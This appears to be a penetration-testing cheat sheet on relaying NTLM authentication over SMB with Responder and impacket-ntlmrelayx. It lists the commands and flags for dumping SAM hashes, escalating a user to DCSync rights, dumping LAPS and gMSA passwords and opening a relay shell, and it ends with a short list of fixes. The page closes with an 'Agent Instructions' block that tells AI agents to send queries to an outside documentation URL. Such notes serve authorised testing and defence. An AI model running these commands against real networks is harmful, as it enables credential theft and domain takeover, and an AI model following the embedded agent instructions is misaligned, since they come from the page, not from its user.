# smb relay ntlmrelayx **REQUIREMENTS:** * SMB signing must be disabled. * Relayed user creds must be admin on machine ## Information Invoke this attack: request callback to SMB on kali using `\\IP` 1. `responder` will capture the request, pass it to `ntlmrelayx` 2. ntlmrelayx will relay the request to TARGET.txt 1. Enables RemoteRegistry 1. Captures system bootkey 2. Performs intended action; Default action: SAM dump using `secretsdump.py` 3. Retores RemoteRegistry back to disabled state. ```bash impacket-ntlmrelayx [-6] [-t TARGET | -tf TARGET_FILE] -smb2support [-l LOOT_DIR] [-i] [-e "SHELL.exe"] [-c "COMMANDS"] --escalate-user USER: will escalate to add ACL Replication-Get-Changes-All for USER on DC (DCSync) # -6: IPv6 # -i: will open a smb shell, can connect using nc IP PORT # --dump-laps: dump LAPS passwords # --dump-gmsa: dump gMSA passwords ``` ## SMB-check ```bash nmap --script=smb2-security-mode.nse -p 445 IP/CIDR ``` ## Method: 1. set `SMB=Off` and `HTTP=Off` in `/etc/responder/Responder.conf` 2. Run `sudo responder -I INTF -rdwv` 3. Run `ntlmrelayx.py -tf TARGET.txt -smb2support [FLAGS]` ## Fix * Enable SMB signing on all devices (can cause performance issues). * Disable NTLM Auth on network * Account tiering (restricting domain admins to specific tasks) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/kashz-jewels/active-directory/ntlmrelayx.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.